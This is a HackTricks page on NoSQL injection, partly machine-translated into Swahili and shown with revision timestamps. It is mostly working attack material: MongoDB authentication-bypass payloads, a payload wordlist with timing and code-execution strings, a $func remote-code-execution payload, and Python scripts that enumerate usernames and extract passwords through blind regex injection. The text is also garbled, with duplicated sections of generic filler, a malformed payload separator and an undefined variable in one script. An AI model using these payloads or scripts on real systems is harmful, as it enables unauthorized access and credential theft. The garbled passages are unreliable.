hacktricks/pentesting-web/nosql-injection.md

401 lines
20 KiB
Markdown
Raw Normal View History

2024-02-11 02:13:58 +00:00
# Uvamizi wa NoSQL
2022-04-28 16:01:33 +00:00
<figure><img src="../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
2022-08-31 22:35:39 +00:00
2024-02-11 02:13:58 +00:00
Tumia [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) kujenga na **kutumia taratibu za kiotomatiki** zinazotumia zana za jamii za **kisasa zaidi** duniani.\
Pata Ufikiaji Leo:
2022-08-31 22:35:39 +00:00
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
2022-04-28 16:01:33 +00:00
<details>
2024-02-11 02:13:58 +00:00
<summary><strong>Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
2022-04-28 16:01:33 +00:00
2024-02-11 02:13:58 +00:00
Njia nyingine za kusaidia HackTricks:
2023-12-31 01:25:17 +00:00
2024-02-11 02:13:58 +00:00
* Ikiwa unataka kuona **kampuni yako inatangazwa katika HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
2022-04-28 16:01:33 +00:00
</details>
2024-02-11 02:13:58 +00:00
## Kutumia udhaifu
2024-02-11 02:13:58 +00:00
Katika PHP unaweza kutuma safu ya data kwa kubadilisha parameter iliyotumwa kutoka _parameter=foo_ hadi _parameter\[arrName]=foo._
2024-02-11 02:13:58 +00:00
Udhaifu huu unategemea kuongeza **Msimamizi**:
```bash
username[$ne]=1$password[$ne]=1 #<Not Equals>
username[$regex]=^adm$password[$ne]=1 #Check a <regular expression>, could be used to brute-force a parameter
username[$regex]=.{25}&pass[$ne]=1 #Use the <regex> to find the length of a value
2021-04-19 22:42:22 +00:00
username[$eq]=admin&password[$ne]=1 #<Equals>
username[$ne]=admin&pass[$lt]=s #<Less than>, Brute-force pass[$lt] to find more users
username[$ne]=admin&pass[$gt]=s #<Greater Than>
username[$nin][admin]=admin&username[$nin][test]=test&pass[$ne]=7 #<Matches non of the values of the array> (not test and not admin)
{ $where: "this.credits == this.debits" }#<IF>, can be used to execute code
```
2024-02-11 02:13:58 +00:00
### Kupitisha Uthibitishaji wa Msingi
2024-02-11 02:13:58 +00:00
**Kutumia sio sawa ($ne) au kubwa zaidi ($gt)**
```bash
#in URL
username[$ne]=toto&password[$ne]=toto
2021-06-26 15:50:17 +00:00
username[$regex]=.*&password[$regex]=.*
username[$exists]=true&password[$exists]=true
#in JSON
{"username": {"$ne": null}, "password": {"$ne": null} }
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"} }
{"username": {"$gt": undefined}, "password": {"$gt": undefined} }
```
2024-01-04 09:08:44 +00:00
### **SQL - Mongo**
2024-02-11 02:13:58 +00:00
#### **NoSQL Injection**
NoSQL injection is a type of vulnerability that occurs when an attacker is able to manipulate a NoSQL query in order to retrieve unauthorized data or perform unauthorized actions on a NoSQL database.
#### **NoSQL Injection Techniques**
1. **Boolean-based Injection**: This technique involves injecting a boolean expression into the query in order to determine if a specific condition is true or false. By manipulating the query, an attacker can extract sensitive information from the database.
2. **Time-based Injection**: In this technique, an attacker injects a delay into the query in order to determine if a specific condition is true or false. By measuring the time it takes for the query to execute, an attacker can extract information from the database.
3. **Error-based Injection**: This technique involves injecting a query that causes an error in order to extract information from the error message. By manipulating the query, an attacker can retrieve sensitive data from the database.
4. **Union-based Injection**: In this technique, an attacker injects a query that combines the results of two or more queries into a single result set. By manipulating the query, an attacker can retrieve data from multiple tables in the database.
#### **Preventing NoSQL Injection**
To prevent NoSQL injection, it is important to follow these best practices:
1. **Input Validation**: Validate and sanitize all user input before using it in a NoSQL query.
2. **Parameterized Queries**: Use parameterized queries or prepared statements to ensure that user input is properly escaped and sanitized.
3. **Least Privilege Principle**: Limit the privileges of the database user used by the application to only what is necessary.
4. **Secure Configuration**: Ensure that the NoSQL database is properly configured and secured to prevent unauthorized access.
By following these best practices, you can significantly reduce the risk of NoSQL injection vulnerabilities in your application.
```javascript
query = { $where: `this.username == '${username}'` }
```
2024-02-11 02:13:58 +00:00
Mshambuliaji anaweza kutumia hili kwa kuingiza maneno kama `admin' || 'a'=='a`, kufanya swali liwarudishie nyaraka zote kwa kuridhisha hali na tautolojia (`'a'=='a'`). Hii inafanana na mashambulizi ya kuingiza SQL ambapo maneno kama `' or 1=1-- -` hutumiwa kudhibiti maswali ya SQL. Katika MongoDB, kuingizwa kama hii inaweza kufanywa kwa kutumia maneno kama `' || 1==1//`, `' || 1==1%00`, au `admin' || 'a'=='a`.
```
Normal sql: ' or 1=1-- -
2024-01-04 09:08:44 +00:00
Mongo sql: ' || 1==1// or ' || 1==1%00 or admin' || 'a'=='a
```
2024-02-11 02:13:58 +00:00
### Pata habari ya **urefu** (length)
To extract the length information in a NoSQL injection attack, you can use the `$where` operator in MongoDB or the `regex` operator in other NoSQL databases.
#### MongoDB
In MongoDB, you can use the `$where` operator to execute JavaScript code on the server. By using the `toString()` method on the target field and checking its length, you can extract the length information.
```javascript
db.collection.find({ $where: "this.target.toString().length == 10" })
```
Replace `collection` with the name of the target collection and `target` with the name of the field you want to extract the length from. Adjust the length value (`10` in the example) according to your needs.
#### Other NoSQL Databases
In other NoSQL databases, you can use the `regex` operator to match a regular expression against the target field. By crafting a regular expression that matches a specific length, you can extract the length information.
```javascript
db.collection.find({ field: { $regex: /^.{10}$/ } })
```
2024-02-11 02:13:58 +00:00
Replace `collection` with the name of the target collection, `field` with the name of the field you want to extract the length from, and adjust the length value (`10` in the example) according to your needs.
2024-02-11 02:13:58 +00:00
Remember to test different lengths to find the correct length of the target field.
```bash
username[$ne]=toto&password[$regex]=.{1}
username[$ne]=toto&password[$regex]=.{3}
# True if the length equals 1,3...
```
2024-02-11 02:13:58 +00:00
### Pata habari za **data**
Unaweza kutumia kuvuja kwa NoSQL kuchunguza na kuchota habari za data kutoka kwa programu zinazotumia teknolojia ya NoSQL. Kwa kufanya hivyo, unaweza kupata habari muhimu kama majina ya watumiaji, nywila, anwani za barua pepe, na habari nyingine ya siri.
Kuna njia kadhaa za kufanya hivyo, kulingana na aina ya kuvuja kwa NoSQL inayotumiwa na programu. Hapa kuna mifano ya njia mbili za kawaida:
#### 1. Kuvuja kwa NoSQL kwa kutumia maombi ya kawaida
Ikiwa programu inatumia maombi ya kawaida kama `find`, `findOne`, au `aggregate`, unaweza kujaribu kuvuja kwa NoSQL kwa kubadilisha maombi hayo. Kwa mfano, unaweza kujaribu kubadilisha maombi ya kawaida kuwa maombi ya kuvuja kwa NoSQL kwa kuongeza opereta ya kuvuja kama `$ne` (si sawa na) au `$regex` (kutumia kanuni za kawaida).
#### 2. Kuvuja kwa NoSQL kwa kutumia maombi ya kawaida na mchanganyiko wa maombi
2024-02-11 02:13:58 +00:00
Ikiwa programu inatumia mchanganyiko wa maombi ya kawaida, unaweza kujaribu kuvuja kwa NoSQL kwa kuchanganya maombi tofauti. Kwa mfano, unaweza kujaribu kuchanganya maombi ya kawaida na opereta za kuvuja kama `$ne` au `$regex` ili kupata habari ya siri.
2024-02-11 02:13:58 +00:00
Ni muhimu kuelewa muundo wa data na jinsi maombi yanavyofanya kazi ili uweze kubadilisha maombi kwa usahihi na kupata habari unayotafuta.
```
in URL (if length == 3)
username[$ne]=toto&password[$regex]=a.{2}
username[$ne]=toto&password[$regex]=b.{2}
...
username[$ne]=toto&password[$regex]=m.{2}
username[$ne]=toto&password[$regex]=md.{1}
username[$ne]=toto&password[$regex]=mdp
username[$ne]=toto&password[$regex]=m.*
username[$ne]=toto&password[$regex]=md.*
in JSON
{"username": {"$eq": "admin"}, "password": {"$regex": "^m" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^md" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }}
```
2024-02-11 02:13:58 +00:00
### **SQL - Mongo**
2022-08-31 22:35:39 +00:00
### **SQL - Mongo**
2024-02-11 02:13:58 +00:00
MongoDB is a popular NoSQL database that uses a document-oriented model to store data. It is widely used in web applications and offers a flexible and scalable solution for managing large amounts of data.
#### **NoSQL Injection**
NoSQL injection is a type of attack that targets NoSQL databases, such as MongoDB, by exploiting vulnerabilities in the application's input validation. This attack allows an attacker to manipulate the database queries and potentially gain unauthorized access to sensitive data.
#### **NoSQL Injection Techniques**
1. **Boolean-based Injection**: This technique involves injecting boolean-based queries to determine if a query is true or false. By manipulating the query, an attacker can extract information from the database.
2. **Time-based Injection**: In this technique, an attacker injects time delays into the query to determine if the injected query is executed. By measuring the response time, an attacker can extract information from the database.
3. **Union-based Injection**: Union-based injection involves injecting queries that combine the results of multiple queries. By manipulating the query, an attacker can extract information from different parts of the database.
4. **Error-based Injection**: Error-based injection involves injecting queries that cause the application to generate an error message. By analyzing the error message, an attacker can extract information from the database.
#### **Preventing NoSQL Injection**
To prevent NoSQL injection attacks, it is important to implement proper input validation and sanitization techniques. Here are some best practices:
- **Input Validation**: Validate and sanitize all user input before using it in database queries.
- **Parameterized Queries**: Use parameterized queries or prepared statements to ensure that user input is properly escaped and treated as data, rather than executable code.
- **Least Privilege Principle**: Limit the privileges of the database user used by the application to minimize the potential impact of an injection attack.
- **Secure Configuration**: Ensure that the database server is properly configured and updated to mitigate known vulnerabilities.
By following these best practices, you can significantly reduce the risk of NoSQL injection attacks and protect your application's data.
```
/?search=admin' && this.password%00 --> Check if the field password exists
/?search=admin' && this.password && this.password.match(/.*/)%00 --> start matching password
/?search=admin' && this.password && this.password.match(/^a.*$/)%00
/?search=admin' && this.password && this.password.match(/^b.*$/)%00
/?search=admin' && this.password && this.password.match(/^c.*$/)%00
...
/?search=admin' && this.password && this.password.match(/^duvj.*$/)%00
...
/?search=admin' && this.password && this.password.match(/^duvj78i3u$/)%00 Found
```
2024-02-11 02:13:58 +00:00
### Utekelezaji wa Kazi Isiyohusiana na PHP
2024-02-11 02:13:58 +00:00
Kwa kutumia operator **$func** wa maktaba ya [MongoLite](https://github.com/agentejo/cockpit/tree/0.11.1/lib/MongoLite) (inayotumiwa kwa chaguo-msingi), inaweza kuwa inawezekana kutekeleza kazi isiyohusiana kama ilivyo katika [ripoti hii](https://swarm.ptsecurity.com/rce-cockpit-cms/).
```python
"user":{"$func": "var_dump"}
```
2024-02-06 03:10:38 +00:00
![https://swarm.ptsecurity.com/wp-content/uploads/2021/04/cockpit_auth_check_10.png](<../.gitbook/assets/image (468).png>)
2024-02-11 02:13:58 +00:00
### Pata habari kutoka kwa mkusanyiko tofauti
2023-03-23 14:03:29 +00:00
2024-02-11 02:13:58 +00:00
Inawezekana kutumia [**$lookup**](https://www.mongodb.com/docs/manual/reference/operator/aggregation/lookup/) kupata habari kutoka kwa mkusanyiko tofauti. Katika mfano ufuatao, tunasoma kutoka kwa **mkusanyiko tofauti** unaoitwa **`users`** na kupata **matokeo ya kuingia** yote na nenosiri linalolingana na kichujio cha wilcard.
2023-03-23 14:03:29 +00:00
```json
[
2024-02-11 02:13:58 +00:00
{
"$lookup":{
"from": "users",
"as":"resultado","pipeline": [
{
"$match":{
"password":{
"$regex":"^.*"
}
}
}
]
}
}
2023-03-23 14:03:29 +00:00
]
```
<figure><img src="../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
2022-08-31 22:35:39 +00:00
\
2024-02-11 02:13:58 +00:00
Tumia [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) kujenga na **kutumia taratibu za kiotomatiki** zinazotumia zana za jamii **zinazoendelea zaidi** duniani.\
Pata Ufikiaji Leo:
2022-08-31 22:35:39 +00:00
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
2024-02-11 02:13:58 +00:00
## Malipo ya MongoDB
2024-02-06 03:10:38 +00:00
2024-02-11 02:13:58 +00:00
Orodha [kutoka hapa](https://github.com/cr0hn/nosqlinjection_wordlists/blob/master/mongodb_nosqli.txt)
2024-02-06 03:10:38 +00:00
```
true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
|| 1==1//
|| 1==1%00
}, { password : /.*/ }
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
{$gt: ''}
[$ne]=1
';sleep(5000);
';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);
{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"}}
{"username": {"$gt": undefined}, "password": {"$gt": undefined}}
{"username": {"$gt":""}, "password": {"$gt":""}}
{"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}}
```
2024-02-11 02:13:58 +00:00
## Skripti ya Blind NoSQL
### Maelezo
Blind NoSQL Injection ni aina ya shambulio ambapo mtu anajaribu kudhibiti au kupata habari kutoka kwa hifadhidata ya NoSQL. Shambulio hili linategemea udhaifu katika jinsi maombi yanavyoshughulikia maombi ya hifadhidata ya NoSQL.
### Hatua ya 1: Kuchunguza Udhaifu
Kabla ya kuanza shambulio la Blind NoSQL Injection, ni muhimu kuchunguza ikiwa maombi yanayojaribiwa yana udhaifu huu. Unaweza kufanya hivyo kwa kuchunguza majibu ya maombi na kuchunguza ikiwa kuna ishara za udhaifu wa NoSQL Injection.
### Hatua ya 2: Kugundua Muundo wa Hifadhidata
2024-02-06 03:10:38 +00:00
2024-02-11 02:13:58 +00:00
Ili kufanikisha shambulio la Blind NoSQL Injection, unahitaji kugundua muundo wa hifadhidata. Hii inaweza kufanywa kwa kutuma maombi tofauti na kuchunguza majibu ili kubaini muundo wa hifadhidata.
2024-02-11 02:13:58 +00:00
### Hatua ya 3: Kujenga Script ya Blind NoSQL
Baada ya kugundua muundo wa hifadhidata, unaweza kuanza kujenga skripti ya Blind NoSQL Injection. Skripti hii itatumika kudhibiti maombi na kufanya maswali ya NoSQL Injection kwa kutumia mbinu za kipofu.
### Hatua ya 4: Kutekeleza Shambulio
Hatua ya mwisho ni kutekeleza shambulio la Blind NoSQL Injection kwa kutumia skripti iliyoundwa. Shambulio hili linaweza kusababisha kupata habari nyeti kutoka kwa hifadhidata au hata kudhibiti maombi yenyewe.
### Tahadhari
Ni muhimu kutambua kuwa shambulio la Blind NoSQL Injection ni kinyume cha sheria na linaweza kusababisha madhara makubwa. Ni muhimu kufanya shambulio hili tu kwa idhini ya mmiliki wa mfumo unaolengwa na kwa madhumuni ya kujaribu usalama.
```python
import requests, string
alphabet = string.ascii_lowercase + string.ascii_uppercase + string.digits + "_@{}-/()!\"$%=^[]:;"
flag = ""
for i in range(21):
2024-02-11 02:13:58 +00:00
print("[i] Looking for char number "+str(i+1))
for char in alphabet:
r = requests.get("http://chall.com?param=^"+flag+char)
if ("<TRUE>" in r.text):
flag += char
print("[+] Flag: "+flag)
break
```
```python
import requests
import urllib3
import string
import urllib
urllib3.disable_warnings()
username="admin"
password=""
while True:
2024-02-11 02:13:58 +00:00
for c in string.printable:
if c not in ['*','+','.','?','|']:
payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c)
r = requests.post(u, data = {'ids': payload}, verify = False)
if 'OK' in r.text:
print("Found one more char : %s" % (password+c))
password += c
```
2024-02-11 02:13:58 +00:00
### Kuvunja nguvu majina ya mtumiaji na nywila kutoka kwa kuingia POST
2024-02-11 02:13:58 +00:00
Hii ni hati rahisi ambayo unaweza kubadilisha lakini zana za awali pia zinaweza kufanya kazi hii.
```python
import requests
import string
url = "http://example.com"
headers = {"Host": "exmaple.com"}
cookies = {"PHPSESSID": "s3gcsgtqre05bah2vt6tibq8lsdfk"}
possible_chars = list(string.ascii_letters) + list(string.digits) + ["\\"+c for c in string.punctuation+string.whitespace ]
def get_password(username):
2024-02-11 02:13:58 +00:00
print("Extracting password of "+username)
params = {"username":username, "password[$regex]":"", "login": "login"}
password = "^"
while True:
for c in possible_chars:
params["password[$regex]"] = password + c + ".*"
pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)
if int(pr.status_code) == 302:
password += c
break
if c == possible_chars[-1]:
print("Found password "+password[1:].replace("\\", "")+" for username "+username)
return password[1:].replace("\\", "")
def get_usernames(prefix):
2024-02-11 02:13:58 +00:00
usernames = []
params = {"username[$regex]":"", "password[$regex]":".*"}
for c in possible_chars:
username = "^" + prefix + c
params["username[$regex]"] = username + ".*"
pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)
if int(pr.status_code) == 302:
print(username)
for user in get_usernames(prefix + c):
usernames.append(user)
return usernames
for u in get_usernames(""):
2024-02-11 02:13:58 +00:00
get_password(u)
```
2024-02-11 02:13:58 +00:00
## Vifaa
2024-02-06 03:10:38 +00:00
* [https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration](https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration)
* [https://github.com/C4l1b4n/NoSQL-Attack-Suite](https://github.com/C4l1b4n/NoSQL-Attack-Suite)
2024-02-11 02:13:58 +00:00
## Marejeo
2022-04-28 16:01:33 +00:00
2022-08-31 22:35:39 +00:00
* [https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L\_2uGJGU7AVNRcqRvEi%2Fuploads%2Fgit-blob-3b49b5d5a9e16cb1ec0d50cb1e62cb60f3f9155a%2FEN-NoSQL-No-injection-Ron-Shulman-Peleg-Bronshtein-1.pdf?alt=media](https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L\_2uGJGU7AVNRcqRvEi%2Fuploads%2Fgit-blob-3b49b5d5a9e16cb1ec0d50cb1e62cb60f3f9155a%2FEN-NoSQL-No-injection-Ron-Shulman-Peleg-Bronshtein-1.pdf?alt=media)
2022-09-09 11:00:52 +00:00
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection)
2024-02-06 03:10:38 +00:00
* [https://nullsweep.com/a-nosql-injection-primer-with-mongo/](https://nullsweep.com/a-nosql-injection-primer-with-mongo/)
* [https://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb](https://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb)
2022-04-28 16:01:33 +00:00
<details>
2024-02-11 02:13:58 +00:00
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2022-04-28 16:01:33 +00:00
2024-02-11 02:13:58 +00:00
Njia nyingine za kusaidia HackTricks:
2023-12-31 01:25:17 +00:00
2024-02-11 02:13:58 +00:00
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
2022-04-28 16:01:33 +00:00
</details>
<figure><img src="../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
2022-08-31 22:35:39 +00:00
\
2024-02-11 02:13:58 +00:00
Tumia [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) kujenga na **kutumia kiotomatiki** mchakato wa kazi ulioendeshwa na zana za jamii za **juu zaidi** duniani.\
Pata Ufikiaji Leo:
2022-04-28 16:01:33 +00:00
2022-08-31 22:35:39 +00:00
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}